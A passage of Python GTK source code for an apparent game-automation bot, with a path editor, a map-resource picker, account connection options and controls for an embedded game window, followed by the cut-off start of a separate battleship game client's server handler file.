bot_path_filechooserbutton.connect('file-set', self.on_bot_path_changed)
self.bot_widgets.add(bot_path_filechooserbutton)
## Start From Step
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
hbox.set_margin_left(10)
self.bot_widgets.add(hbox)
hbox.add(Gtk.Label('Start From Step'))
self.step_spin_button = SpinButton(min=1, max=1000)
self.step_spin_button.set_margin_left(10)
hbox.pack_end(self.step_spin_button, False, False, 0)
## Repeat Path
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
hbox.set_margin_left(10)
hbox.add(Gtk.Label('Repeat Path'))
self.bot_widgets.add(hbox)
# Switch
self.repeat_switch = Gtk.Switch()
self.repeat_switch.connect('notify::active', lambda switch, pspec: self.repeat_spin_button.set_sensitive(switch.get_active()))
vbox = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
vbox.pack_start(self.repeat_switch, True, False, 0)
hbox.add(vbox)
# SpinButton
self.repeat_spin_button = SpinButton(min=2, max=1000)
self.repeat_spin_button.set_tooltip_text('Number of times')
self.repeat_spin_button.set_sensitive(False)
hbox.pack_end(self.repeat_spin_button, False, False, 0)
## Connect To Account
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
hbox.add(Gtk.Label('<b>Connect To Account</b>', xalign=0, use_markup=True))
self.bot_widgets.add(hbox)
# Switch
self.connect_to_account_switch = Gtk.Switch()
self.connect_to_account_switch.connect('notify::active', lambda switch, pspec: self.connect_to_account_box.set_sensitive(switch.get_active()))
hbox.pack_end(self.connect_to_account_switch, False, False, 0)
# Box
self.connect_to_account_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
self.connect_to_account_box.set_margin_left(10)
self.connect_to_account_box.set_sensitive(False)
self.bot_widgets.add(self.connect_to_account_box)
# Account
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
hbox.add(Gtk.Label('Account'))
self.connect_to_account_box.add(hbox)
# Combo
accounts_list = accounts.load()
self.accounts_combo = TextValueComboBox(accounts_list, model=Gtk.ListStore(str, int), text_key='login', value_key='id', sort_key='position')
self.accounts_combo.set_size_request(120, -1)
hbox.pack_end(self.accounts_combo, False, False, 0)
# Disconnect after
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
hbox.add(Gtk.Label('Disconnect after'))
self.connect_to_account_box.add(hbox)
# Switch
self.disconnect_after_switch = Gtk.Switch()
hbox.pack_end(self.disconnect_after_switch, False, False, 0)
## Pod
self.podbar_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
bot_page.add(self.podbar_box)
self.podbar_box.add(Gtk.Label('<b>Pod</b>', xalign=0, use_markup=True))
vbox = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
self.podbar_box.pack_start(vbox, True, True, 0)
self.podbar = Gtk.ProgressBar()
vbox.pack_start(self.podbar, True, False, 0)
## MiniMap
self.minimap_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
bot_page.add(self.minimap_box)
self.minimap_box.add(Gtk.Label('<b>MiniMap</b>', xalign=0, use_markup=True))
self.minimap = MiniMap(grid_size=(18, 18))
self.minimap.set_size_request(-1, 210)
self.minimap.set_margin_left(10)
self.minimap_box.add(self.minimap)
## Start
button_box = ButtonBox(centered=True, linked=True)
bot_page.pack_end(button_box, False, False, 0)
self.start_button = Gtk.Button()
self.start_button.set_tooltip_text('Start')
self.start_button.set_image(Gtk.Image(icon_name='media-playback-start'))
self.start_button.connect('clicked', self.on_start_button_clicked)
button_box.add(self.start_button)
## Pause
self.pause_button = Gtk.Button()
self.pause_button.set_image(Gtk.Image(icon_name='media-playback-pause'))
self.pause_button.set_tooltip_text('Pause')
self.pause_button.set_sensitive(False)
self.pause_button.connect('clicked', self.on_pause_button_clicked)
button_box.add(self.pause_button)
## Stop
self.stop_button = Gtk.Button()
self.stop_button.set_image(Gtk.Image(icon_name='media-playback-stop'))
self.stop_button.set_tooltip_text('Stop')
self.stop_button.set_sensitive(False)
self.stop_button.connect('clicked', self.on_stop_button_clicked)
button_box.add(self.stop_button)
### Path Tab
path_page = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
path_page.set_border_width(10)
bot_notebook.append_page(path_page, Gtk.Label('Path'))
## Movement
path_page.add(Gtk.Label('<b>Movement</b>', xalign=0, use_markup=True))
button_box = ButtonBox(orientation=Gtk.Orientation.VERTICAL, centered=True)
path_page.add(button_box)
# Up
up_button = Gtk.Button()
up_button.set_image(Gtk.Image(icon_name='go-up'))
up_button.connect('clicked', lambda button: self.path_listbox.append_text('Move(UP)'))
button_box.add(up_button)
# Left
left_button = Gtk.Button()
left_button.set_image(Gtk.Image(icon_name='go-previous'))
left_button.connect('clicked', lambda button: self.path_listbox.append_text('Move(LEFT)'))
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=40)
hbox.add(left_button)
button_box.add(hbox)
# Right
right_button = Gtk.Button()
right_button.set_image(Gtk.Image(icon_name='go-next'))
right_button.connect('clicked', lambda buton: self.path_listbox.append_text('Move(RIGHT)'))
hbox.add(right_button)
# Down
down_button = Gtk.Button()
down_button.set_image(Gtk.Image(icon_name='go-down'))
down_button.connect('clicked', lambda button: self.path_listbox.append_text('Move(DOWN)'))
button_box.add(down_button)
## Action
path_page.add(Gtk.Label('<b>Action</b>', xalign=0, use_markup=True))
stack_listbox = StackListBox()
path_page.add(stack_listbox)
## Enclos
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(tools.get_full_path('icons/enclos.png'), 24, 24)
image = Gtk.Image(pixbuf=pixbuf)
label = ImageLabel(image, 'Enclos')
widget = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
stack_listbox.append(label, widget)
# Location
widget.add(Gtk.Label('<b>Location</b>', xalign=0, use_markup=True))
self.enclos_location_combo = CustomComboBox(data.Enclos, sort=True)
self.enclos_location_combo.set_margin_left(10)
widget.add(self.enclos_location_combo)
# Type
widget.add(Gtk.Label('<b>Type</b>', xalign=0, use_markup=True))
self.enclos_type_combo = CustomComboBox(data.EnclosType, sort=True)
self.enclos_type_combo.set_margin_left(10)
widget.add(self.enclos_type_combo)
# Add
add_button = Gtk.Button('Add')
add_button.connect('clicked', lambda button: self.path_listbox.append_text('Enclos(location=%s,type=%s)' % (self.enclos_location_combo.get_active_text(), self.enclos_type_combo.get_active_text())))
button_box = ButtonBox(centered=True)
button_box.add(add_button)
widget.add(button_box)
## Zaap
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(tools.get_full_path('icons/zaap.png'), 24, 24)
image = Gtk.Image(pixbuf=pixbuf)
label = ImageLabel(image, 'Zaap')
widget = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
stack_listbox.append(label, widget)
# From
widget.add(Gtk.Label('<b>From</b>', xalign=0, use_markup=True))
self.zaap_from_combo = CustomComboBox(data.Zaap['From'], sort=True)
self.zaap_from_combo.set_margin_left(10)
self.zaap_from_combo.connect('changed', lambda combo:
combo.sync_with_combo(self.zaap_to_combo)
)
widget.add(self.zaap_from_combo)
# To
widget.add(Gtk.Label('<b>To</b>', xalign=0, use_markup=True))
self.zaap_to_combo = CustomComboBox(data.Zaap['To'], sort=True)
self.zaap_to_combo.set_margin_left(10)
self.zaap_to_combo.connect('changed', lambda combo:
combo.sync_with_combo(self.zaap_from_combo)
)
widget.add(self.zaap_to_combo)
# Add
add_button = Gtk.Button('Add')
add_button.connect('clicked', lambda button: self.path_listbox.append_text('Zaap(from=%s,to=%s)' % (self.zaap_from_combo.get_active_text(), self.zaap_to_combo.get_active_text())))
button_box = ButtonBox(centered=True)
button_box.add(add_button)
widget.add(button_box)
## Zaapi
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(tools.get_full_path('icons/destination.png'), 24, 24)
image = Gtk.Image(pixbuf=pixbuf)
label = ImageLabel(image, 'Zaapi')
widget = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
stack_listbox.append(label, widget)
# From
widget.add(Gtk.Label('<b>From</b>', xalign=0, use_markup=True))
self.zaapi_from_combo = CustomComboBox(data.Zaapi['From'], sort=True)
self.zaapi_from_combo.set_margin_left(10)
self.zaapi_from_combo.connect('changed', lambda combo:
combo.sync_with_combo(self.zaapi_to_combo, use_contains=True)
)
widget.add(self.zaapi_from_combo)
# To
widget.add(Gtk.Label('<b>To</b>', xalign=0, use_markup=True))
self.zaapi_to_combo = CustomComboBox(data.Zaapi['To'], sort=True)
self.zaapi_to_combo.set_margin_left(10)
self.zaapi_to_combo.connect('changed', lambda combo:
combo.sync_with_combo(self.zaapi_from_combo, use_contains=True)
)
widget.add(self.zaapi_to_combo)
# Add
add_button = Gtk.Button('Add')
add_button.connect('clicked', lambda button: self.path_listbox.append_text('Zaapi(from=%s,to=%s)' % (self.zaapi_from_combo.get_active_text(), self.zaapi_to_combo.get_active_text())))
button_box = ButtonBox(centered=True)
button_box.add(add_button)
widget.add(button_box)
## Collect
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(tools.get_full_path('icons/miner.png'), 24, 24)
image = Gtk.Image(pixbuf=pixbuf)
label = ImageLabel(image, 'Collect')
widget = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
stack_listbox.append(label, widget)
# Map
widget.add(Gtk.Label('<b>Map</b>', xalign=0, use_markup=True))
self.collect_map_combo = CustomComboBox(maps.load(), sort=True)
self.collect_map_combo.set_margin_left(10)
widget.add(self.collect_map_combo)
# Store Path
widget.add(Gtk.Label('<b>Store Path</b>', xalign=0, use_markup=True))
# Combo
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
hbox.set_margin_left(10)
self.collect_sp_combo_radio = Gtk.RadioButton()
self.collect_sp_combo_radio.set_active(True)
hbox.add(self.collect_sp_combo_radio)
self.collect_sp_combo = CustomComboBox(data.BankPath, sort=True)
self.collect_sp_combo.connect('changed', lambda combo: self.collect_sp_combo_radio.set_active(True))
hbox.pack_start(self.collect_sp_combo, True, True, 0)
widget.add(hbox)
# FileChooserButton
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
hbox.set_margin_left(10)
self.collect_sp_filechooser_radio = Gtk.RadioButton(group=self.collect_sp_combo_radio)
hbox.add(self.collect_sp_filechooser_radio)
self.collect_sp_filechooserbutton = FileChooserButton(title='Choose store path', filter=('Store Path', '*.path'))
self.collect_sp_filechooserbutton.set_current_folder(tools.get_full_path('paths'))
self.collect_sp_filechooserbutton.connect('file-set', lambda filechooserbutton: self.collect_sp_filechooser_radio.set_active(True))
hbox.pack_start(self.collect_sp_filechooserbutton, True, True, 0)
widget.add(hbox)
# Add
add_button = Gtk.Button('Add')
add_button.connect('clicked', lambda button: self.path_listbox.append_text('Collect(map=%s,store_path=%s)' % (self.collect_map_combo.get_active_text(), self.collect_sp_combo.get_active_text() if self.collect_sp_combo_radio.get_active() else self.collect_sp_filechooserbutton.get_filename())))
button_box = ButtonBox(centered=True)
button_box.add(add_button)
widget.add(button_box)
## Click
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(tools.get_full_path('icons/arrow.png'), 24, 24)
#pixbuf = Gdk.Cursor(Gdk.CursorType.ARROW).get_image().scale_simple(24, 24, GdkPixbuf.InterpType.BILINEAR)
image = Gtk.Image(pixbuf=pixbuf)
label = ImageLabel(image, 'Click')
widget = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
stack_listbox.append(label, widget)
# Twice
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
hbox.add(Gtk.Label('<b>Twice</b>', xalign=0, use_markup=True))
self.click_twice_switch = Gtk.Switch()
hbox.pack_end(self.click_twice_switch, False, False, 0)
widget.add(hbox)
# Location
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
hbox.add(Gtk.Label('<b>Location</b>', xalign=0, use_markup=True))
cursor_pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(tools.get_full_path('icons/crosshair.png'), 16, 16)
#cursor_pixbuf = Gdk.Cursor(Gdk.CursorType.CROSSHAIR).get_image().scale_simple(18, 18, GdkPixbuf.InterpType.BILINEAR)
self.select_button = Gtk.Button()
self.select_button.set_size_request(40, -1)
self.select_button.set_tooltip_text('Select')
self.select_button.set_image(Gtk.Image(pixbuf=cursor_pixbuf))
self.select_button.connect('clicked', self.on_select_button_clicked)
hbox.pack_end(self.select_button, False, False, 0)
widget.add(hbox)
## Wait
pixbuf = GdkPixbuf.Pixbuf.new_from_file_at_size(tools.get_full_path('icons/hourglass.png'), 24, 24)
image = Gtk.Image(pixbuf=pixbuf)
label = ImageLabel(image, 'Wait')
widget = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
stack_listbox.append(label, widget)
# Pause Bot
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
hbox.add(Gtk.Label('<b>Pause Bot</b>', xalign=0, use_markup=True))
self.pause_bot_switch = Gtk.Switch()
self.pause_bot_switch.connect('notify::active', lambda switch, pspec: self.duration_box.set_sensitive(not switch.get_active()))
hbox.pack_end(self.pause_bot_switch, False, False, 0)
widget.add(hbox)
# Duration
self.duration_box = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
label = Gtk.Label('<b>Duration</b>', xalign=0, use_markup=True)
label.set_tooltip_text('(in seconds)')
self.duration_box.add(label)
self.duration_spin_button = SpinButton(min=1, max=60)
self.duration_box.pack_end(self.duration_spin_button, False, False, 0)
widget.add(self.duration_box)
# Add
add_button = Gtk.Button('Add')
add_button.connect('clicked', lambda button: self.path_listbox.append_text('Wait(duration=%d,pause=%s)' % (0 if self.pause_bot_switch.get_active() else self.duration_spin_button.get_value_as_int(), self.pause_bot_switch.get_active())))
button_box = ButtonBox(centered=True)
button_box.add(add_button)
widget.add(button_box)
## Keyboard
image = Gtk.Image(icon_name='input-keyboard', icon_size=Gtk.IconSize.LARGE_TOOLBAR)
label = ImageLabel(image, 'Keyboard')
widget = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
stack_listbox.append(label, widget)
# Press Key
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
self.press_key_radio = Gtk.RadioButton()
self.press_key_radio.add(Gtk.Label('<b>Press Key</b>', xalign=0, use_markup=True))
hbox.add(self.press_key_radio)
self.key_label = Gtk.Label()
hbox.add(self.key_label)
widget.add(hbox)
self.keys_combo = CustomComboBox(data.KeyboardShortcuts, sort=True)
self.keys_combo.set_margin_left(10)
self.keys_combo.connect('changed', lambda combo: (
self.key_label.set_text('(' + data.KeyboardShortcuts[combo.get_active_text()] + ')'),
self.press_key_radio.set_active(True)
)
)
widget.add(self.keys_combo)
# Type Text
self.type_text_radio = Gtk.RadioButton(group=self.press_key_radio)
self.type_text_radio.add(Gtk.Label('<b>Type Text</b>', xalign=0, use_markup=True))
widget.add(self.type_text_radio)
self.type_text_entry = Gtk.Entry(placeholder_text='Text')
self.type_text_entry.set_margin_left(10)
self.type_text_entry.set_width_chars(10)
self.type_text_entry.connect('focus-in-event', lambda entry, event: self.type_text_radio.set_active(True))
widget.add(self.type_text_entry)
# Add
add_button = Gtk.Button('Add')
add_button.connect('clicked', self.on_keyboard_add_button_clicked)
button_box = ButtonBox(centered=True)
button_box.add(add_button)
widget.add(button_box)
## Connect
image = Gtk.Image(icon_name='network-wired', icon_size=Gtk.IconSize.LARGE_TOOLBAR)
label = ImageLabel(image, 'Connect')
widget = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
stack_listbox.append(label, widget)
# Account
widget.add(Gtk.Label('<b>Account</b>', xalign=0, use_markup=True))
self.connect_accounts_combo = TextValueComboBox(accounts_list, model=Gtk.ListStore(str, int), text_key='login', value_key='id', sort_key='position')
self.connect_accounts_combo.set_margin_left(10)
widget.add(self.connect_accounts_combo)
# Add
add_button = Gtk.Button('Add')
add_button.connect('clicked', lambda button: self.path_listbox.append_text('Connect(account_id=%s)' % self.connect_accounts_combo.get_active_value()))
button_box = ButtonBox(centered=True)
button_box.add(add_button)
widget.add(button_box)
## Disconnect
image = Gtk.Image(icon_name='network-idle', icon_size=Gtk.IconSize.LARGE_TOOLBAR)
label = ImageLabel(image, 'Disconnect')
widget = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
stack_listbox.append(label, widget)
# Exit Game
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
widget.add(hbox)
hbox.add(Gtk.Label('<b>Exit Game</b>', xalign=0, use_markup=True))
self.exit_game_switch = Gtk.Switch()
hbox.pack_end(self.exit_game_switch, False, False, 0)
# Add
add_button = Gtk.Button('Add')
add_button.connect('clicked', lambda button: self.path_listbox.append_text('Disconnect(%s)' % self.exit_game_switch.get_active()))
button_box = ButtonBox(centered=True)
button_box.add(add_button)
widget.add(button_box)
## Separator
path_page.add(Gtk.Separator(orientation=Gtk.Orientation.HORIZONTAL, margin=5))
## Listbox
self.path_listbox = CustomListBox()
path_page.pack_end(self.path_listbox, True, True, 0)
# Load
load_path_button = Gtk.Button()
load_path_button.set_tooltip_text('Load')
load_path_button.set_image(Gtk.Image(icon_name='document-open'))
load_path_button.connect('clicked', self.on_load_path_button_clicked)
self.path_listbox.add_button(load_path_button)
# Save
self.save_path_button = Gtk.Button()
self.save_path_button.set_tooltip_text('Save')
self.save_path_button.set_sensitive(False)
self.save_path_button.set_image(Gtk.Image(icon_name='document-save-as'))
self.save_path_button.connect('clicked', self.on_save_path_button_clicked)
self.path_listbox.add_button(self.save_path_button)
self.path_listbox.on_add(self.on_path_listbox_add)
self.path_listbox.on_delete(self.on_path_listbox_delete)
### Map Tab
map_page = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=5)
map_page.set_border_width(10)
bot_notebook.append_page(map_page, Gtk.Label('Map'))
## View
hbox = Gtk.Box(orientation=Gtk.Orientation.HORIZONTAL, spacing=5)
hbox.add(Gtk.Label('<b>View</b>', xalign=0, use_markup=True))
map_page.add(hbox)
# Options
menu_image = MenuImage()
hbox.add(menu_image)
options_box = Gtk.Box(orientation=Gtk.Orientation.VERTICAL)
menu_image.set_widget(options_box)
# Use data colors
use_data_colors_check = Gtk.CheckButton('Use data colors')
use_data_colors_check.connect('clicked', lambda button: self.map_view.set_use_origin_colors(button.get_active()))
options_box.add(use_data_colors_check)
# Add borders
add_borders_check = Gtk.CheckButton('Add borders')
add_borders_check.connect('clicked', lambda button: self.map_view.set_add_borders(button.get_active()))
options_box.add(add_borders_check)
# Map View
self.map_view = MiniMap()
map_page.pack_start(self.map_view, True, True, 0)
## Data
map_page.add(Gtk.Label('<b>Data</b>', xalign=0, use_markup=True))
self.map_data_listbox = CustomListBox(allow_moving=False)
map_page.pack_start(self.map_data_listbox, True, True, 0)
# Select
self.select_resource_button = Gtk.Button()
self.select_resource_button.set_tooltip_text('Select resource')
self.select_resource_button.set_image(Gtk.Image(pixbuf=cursor_pixbuf))
self.select_resource_button.connect('clicked', self.on_select_resource_button_clicked)
self.map_data_listbox.add_button(self.select_resource_button)
# Edit
edit_map_button = MenuButton(icon_name='document-edit-symbolic')
edit_map_button.set_tooltip_text('Edit')
self.map_data_listbox.add_button(edit_map_button)
button_box = ButtonBox(linked=True)
edit_map_button.add(button_box)
# Load
load_map_button = Gtk.Button()
load_map_button.set_tooltip_text('Load')
load_map_button.set_image(Gtk.Image(icon_name='document-open'))
load_map_button.connect('clicked', self.on_load_map_button_clicked)
button_box.add(load_map_button)
# Delete
delete_map_button = Gtk.Button()
delete_map_button.set_tooltip_text('Delete')
delete_map_button.set_image(Gtk.Image(icon_name='edit-delete'))
delete_map_button.connect('clicked', self.on_delete_map_button_clicked)
button_box.add(delete_map_button)
# Save
self.save_map_button = Gtk.Button()
self.save_map_button.set_tooltip_text('Save')
self.save_map_button.set_sensitive(False)
self.save_map_button.set_image(Gtk.Image(icon_name='document-save-as'))
self.save_map_button.connect('clicked', self.on_save_map_button_clicked)
self.map_data_listbox.add_button(self.save_map_button)
self.map_data_listbox.on_add(self.on_map_data_listbox_add)
self.map_data_listbox.on_delete(self.on_map_data_listbox_delete)
def on_load_map_button_clicked(self, button):
dialog = LoadMapDialog(self)
dialog.run()
def on_delete_map_button_clicked(self, button):
dialog = DeleteMapDialog(self)
dialog.run()
def on_save_map_button_clicked(self, button):
dialog = SaveMapDialog(self)
dialog.run()
def add_map_data(self, location):
# append to listbox
text = '{"x": %d, "y": %d, "width": %d, "height": %d, "color": "%s"}' % location
self.map_data_listbox.append_text(text)
# append to view
point = maps.to_array(text)
self.map_view.add_point(point, 'Resource', MiniMap.point_colors['Resource'])
self.select_resource_button.set_sensitive(True)
self.set_cursor(Gdk.Cursor(Gdk.CursorType.ARROW))
def on_select_resource_button_clicked(self, button):
button.set_sensitive(False)
self.set_cursor(Gdk.Cursor(Gdk.CursorType.CROSSHAIR))
game_location = tools.get_widget_location(self.game_area)
Thread(target=self.wait_for_click, args=(self.add_map_data, game_location)).start()
def on_map_data_listbox_add(self):
if not self.save_map_button.get_sensitive():
self.save_map_button.set_sensitive(True)
def on_map_data_listbox_delete(self, row_index):
self.map_view.remove_point(row_index)
if self.map_data_listbox.is_empty():
self.save_map_button.set_sensitive(False)
def on_path_listbox_add(self):
if not self.save_path_button.get_sensitive():
self.save_path_button.set_sensitive(True)
def on_path_listbox_delete(self, row_index):
if self.path_listbox.is_empty():
self.save_path_button.set_sensitive(False)
def on_load_path_button_clicked(self, button):
dialog = OpenFileDialog('Load Path', self, ('Bot Path', '*.path'))
dialog.set_current_folder(tools.get_full_path('paths'))
response = dialog.run()
if response == Gtk.ResponseType.OK:
# read file
path = tools.read_file(dialog.get_filename())
# append to path listbox
for line in path.splitlines():
self.path_listbox.append_text(line)
dialog.destroy()
def on_save_path_button_clicked(self, button):
dialog = SaveFileDialog('Save as', self, ('Bot Path', '*.path'))
dialog.set_current_folder(tools.get_full_path('paths'))
dialog.set_current_name('path_' + tools.get_date_time() + '.path')
response = dialog.run()
if response == Gtk.ResponseType.OK:
# get all rows text
text = ''
for row in self.path_listbox.get_rows():
text += self.path_listbox.get_row_text(row) + '\n'
# save it to file
tools.save_text_to_file(text, dialog.get_filename())
dialog.destroy()
def on_keyboard_add_button_clicked(self, button):
if self.press_key_radio.get_active():
selected = self.keys_combo.get_active_text()
self.path_listbox.append_text('PressKey(%s)' % parser.parse_data(data.KeyboardShortcuts, selected))
else:
self.path_listbox.append_text('TypeText(%s)' % self.type_text_entry.get_text())
def wait_for_click(self, callback, game_location=None):
# wait for click
tools.wait_for_mouse_event('left_down')
# get mouse position & screen size
x, y = tools.get_mouse_position()
width, height = tools.get_screen_size()
# get pixel color
color = tools.get_pixel_color(x, y)
# adjust location to game window
if game_location is not None:
# get game area location
game_x, game_y, game_width, game_height = game_location
#print('x: %d, y: %d, game_x: %d, game_y: %d, game_width: %d, game_height: %d' % (x, y, game_x, game_y, game_width, game_height))
# scale to game area
if tools.position_is_inside_bounds(x, y, game_x, game_y, game_width, game_height):
# position is inside game area, so we fit x & y to it
x = x - game_x
y = y - game_y
width = game_width
height = game_height
# execute callback
GObject.idle_add(callback, (x, y, width, height, color))
def add_click(self, location):
x, y, width, height, color = location
twice = self.click_twice_switch.get_active()
self.path_listbox.append_text('Click(x=%d,y=%d,width=%d,height=%d,twice=%s)' % (x, y, width, height, twice))
self.select_button.set_sensitive(True)
self.set_cursor(Gdk.Cursor(Gdk.CursorType.ARROW))
def set_cursor(self, cursor):
window = self.get_window() # Gdk.get_default_root_window()
window.set_cursor(cursor)
def on_select_button_clicked(self, button):
button.set_sensitive(False)
self.set_cursor(Gdk.Cursor(Gdk.CursorType.CROSSHAIR))
game_location = tools.get_widget_location(self.game_area)
Thread(target=self.wait_for_click, args=(self.add_click, game_location)).start()
def on_start_button_clicked(self, button):
if self.game_window is None:
AlertDialog(self, 'Please select a game window')
elif not self.bot_path:
AlertDialog(self, 'Please select a bot path')
else:
# get game location
game_location = tools.get_widget_location(self.game_area)
# start bot thread
if self.bot_thread is None or not self.bot_thread.isAlive():
# get thread parameters
start_from_step = self.step_spin_button.get_value_as_int()
repeat_path = self.repeat_spin_button.get_value_as_int() if self.repeat_switch.get_active() else 1
if self.connect_to_account_switch.get_active():
account_id = self.accounts_combo.get_active_value()
disconnect_after = self.disconnect_after_switch.get_active()
else:
account_id = None
disconnect_after = False
# run thread
self.bot_thread = BotThread(self, game_location, start_from_step, repeat_path, account_id, disconnect_after)
self.bot_thread.start()
self.settings_button.set_sensitive(False)
self.bot_widgets.set_sensitive(False)
# resume bot thread if paused
else:
self.bot_thread.resume(game_location)
# enable/disable buttons
self.start_button.set_image(Gtk.Image(file=tools.get_full_path('icons/loader.gif')))
self.start_button.set_sensitive(False)
self.pause_button.set_sensitive(True)
self.stop_button.set_sensitive(True)
def set_internet_state(self, state):
if state:
self.start_button.set_image(Gtk.Image(file=tools.get_full_path('icons/loader.gif')))
else:
self.log(tools.print_internet_state(state), LogType.Error)
self.start_button.set_image(Gtk.Image(icon_name='network-error'))
def set_buttons_to_paused(self):
self.start_button.set_tooltip_text('Resume')
self.start_button.set_image(Gtk.Image(icon_name='media-skip-forward'))
self.start_button.set_sensitive(True)
self.pause_button.set_sensitive(False)
def pause_bot(self):
if self.bot_thread and self.bot_thread.isAlive() and self.bot_thread.pause_event.isSet():
self.bot_thread.pause()
self.set_buttons_to_paused()
def on_pause_button_clicked(self, button):
self.pause_bot()
def reset_buttons(self):
self.start_button.set_tooltip_text('Start')
self.start_button.set_image(Gtk.Image(icon_name='media-playback-start'))
self.start_button.set_sensitive(True)
self.stop_button.set_sensitive(False)
self.pause_button.set_sensitive(False)
self.settings_button.set_sensitive(True)
self.bot_widgets.set_sensitive(True)
def on_stop_button_clicked(self, button):
if self.bot_thread and self.bot_thread.isAlive():
self.bot_thread.stop()
self.reset_buttons()
def on_bot_path_changed(self, filechooserbutton):
self.bot_path = filechooserbutton.get_filename()
def populate_game_window_combo(self):
self.game_window_combo_ignore_change = True
self.game_window_combo.remove_all()
self.game_windowList = tools.get_game_window_list()
self.debug('Populate game window combobox, %d window found' % len(self.game_windowList), DebugLevel.High)
for window_name in self.game_windowList:
self.game_window_combo.append_text(window_name)
self.game_window_combo_ignore_change = False
def focus_game(self):
if self.game_area:
#self.debug('Focus game', DebugLevel.High)
# set keyboard focus
self.game_area.child_focus(Gtk.DirectionType.TAB_BACKWARD)
def on_plug_added(self, widget):
self.debug('Game window plugged')
def on_plug_removed(self, widget):
self.debug('Game window unplugged')
# enable/disable widgets
self.unplug_button.hide()
self.refresh_button.show()
if '--dev' in self.args:
self.plug_button.show()
self.game_window_combo.set_sensitive(True)
self.populate_game_window_combo()
self.take_screenshot_button.set_sensitive(False)
# if game window have been destroyed/closed
game_window_destroyed = self.game_window and self.game_window.is_destroyed()
if game_window_destroyed:
self.game_window = None
# keep or destroy socket
if self.settings['Game']['KeepOpen'] and not game_window_destroyed:
return True
else:
self.game_area = None
def plug_game_window(self, window_xid):
self.game_window = tools.get_game_window(window_xid)
if self.game_window:
# create socket if not exist
if self.game_area is None:
self.game_area = Gtk.Socket()
#self.game_area.set_can_focus(True)
self.game_area.connect('plug-added', self.on_plug_added)
self.game_area.connect('plug-removed', self.on_plug_removed)
self.game_area.show_all()
self.vtable.attach(self.game_area, 0, 1, 0, 3)
# plug game window
self.debug('Plug game window (id: %d)' % window_xid, DebugLevel.Low)
self.game_area.add_id(window_xid)
#self.game_window.reparent(self.game_area.get_window(), 0, 0)
#self.game_window.show() # force show (when minimized)
# enable/disable widgets
self.refresh_button.hide()
if '--dev' in self.args:
self.plug_button.hide()
self.unplug_button.show()
self.game_window_combo.set_sensitive(False)
self.take_screenshot_button.set_sensitive(True)
def on_game_window_combo_changed(self, combo):
if self.game_windowList and not self.game_window_combo_ignore_change:
# get selected game window
selected = combo.get_active_text()
window_xid = self.game_windowList[selected]
# plug it
self.plug_game_window(window_xid)
def unplug_game_window(self):
if self.game_window and not self.game_window.is_destroyed():
self.debug('Keep game window open')
root = Gdk.get_default_root_window()
self.game_window.reparent(root, 0, 0)
self.game_window = None
def on_unplug_button_clicked(self, button):
self.debug('Unplug game window')
if self.settings['Game']['KeepOpen']:
self.unplug_game_window()
else:
self.game_window.destroy()
def on_plug_button_clicked(self, button):
dialog = PlugDialog(self)
dialog.run()
def on_refresh_button_clicked(self, button):
self.populate_game_window_combo()
# Override the default handler for the delete-event signal
def do_delete_event(self, event):
# Show our message dialog
dialog = Gtk.MessageDialog(text='Are you sure you want to quit?', transient_for=self, buttons=Gtk.ButtonsType.OK_CANCEL, message_type=Gtk.MessageType.QUESTION)
response = dialog.run()
dialog.destroy()
# We only terminate when the user presses the OK button
if response == Gtk.ResponseType.OK:
# keep game window
if self.settings['Game']['KeepOpen']:
self.unplug_game_window()
# stop bot thread
if self.bot_thread and self.bot_thread.isAlive():
self.bot_thread.stop()
return False
# Otherwise we keep the application open
return True
def main(self):
Gtk.main()
|
serverhandler.py
|
import logging, socket, sys
from threading import Thread
from messageparser import *
from playingfield import Orientation
reportCodes = {
11: "Begin_Turn",
13: "Update_Own_Field",
14: "Update_Enemy_Field",
15: "Chat_Broadcast",
16: "Update_Lobby",
17: "Game_Ended",
18: "Begin_Ship_Placing",
19: "Game_Aborted",
21: "Successful_Move",
22: "Successful_Attack",
23: "Surrender_Accepted",
24: "Successful_Special_Attack",
27: "Successful_Game_Join",
28: "Successful_Game_Create",
29: "Successful_Ship_Placement",
31: "Illegal_Move",
